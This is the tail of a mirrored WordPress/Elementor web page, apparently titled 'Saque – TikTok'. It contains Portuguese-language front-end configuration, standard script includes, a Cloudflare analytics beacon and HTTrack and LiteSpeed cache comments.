var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Compartilhar no Facebook","shareOnTwitter":"Compartilhar no Twitter","pinIt":"Fixar","download":"Baixar","downloadImage":"Baixar imagem","fullscreen":"Tela cheia","zoom":"Zoom","share":"Compartilhar","playVideo":"Reproduzir v\u00eddeo","previous":"Anterior","next":"Pr\u00f3ximo","close":"Fechar","a11yCarouselPrevSlideMessage":"Slide anterior","a11yCarouselNextSlideMessage":"Pr\u00f3ximo slide","a11yCarouselFirstSlideMessage":"Este \u00e9 o primeiro slide","a11yCarouselLastSlideMessage":"Este \u00e9 o \u00faltimo slide","a11yCarouselPaginationBulletMessage":"Ir para o slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Dispositivos m\u00f3veis no modo retrato","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Dispositivos m\u00f3veis no modo paisagem","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet no modo retrato","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet no modo paisagem","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Notebook","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Tela ampla (widescreen)","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.26.3","is_static":false,"experimentalFeatures":{"additional_custom_breakpoints":true,"container":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_onboarding":true,"e_css_smooth_scroll":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"home_screen":true,"landing-pages":true,"nested-elements":true,"editor_v2":true,"link-in-bio":true,"floating-buttons":true},"urls":{"assets":"https:\/\/respostaspremiada.com\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/respostaspremiada.com\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/respostaspremiada.com\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"d270dbf414"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"body_background_background":"classic","active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"logo","hello_footer_logo_type":"logo"},"post":{"id":1174,"title":"Saque%20%E2%80%93%20TikTok","excerpt":"","featuredImage":false}};
</script>
<script src="js/frontend.min_1.js" id="elementor-frontend-js"></script>
<script src="js/elements-handlers.min.js" id="pro-elements-handlers-js"></script>
	<script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" data-cf-beacon="{" rayid":"8fc74c9b1d37661f","version":"2024.10.5","r":1,"token":"bd8c3c5624904f98875dec16e8aecc25","servertiming":{"name":{"cfextpri":true,"cfl4":true,"cfspeedbrain":true,"cfcachestatus":true}}}"="" crossorigin="anonymous"></script>




</body>
<!-- Mirrored from avalienahora.shop/tiktoksaque/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 May 2025 18:18:59 GMT -->
</html><!-- Page cached by LiteSpeed Cache 6.5.4 on 2025-01-03 22:01:46 -->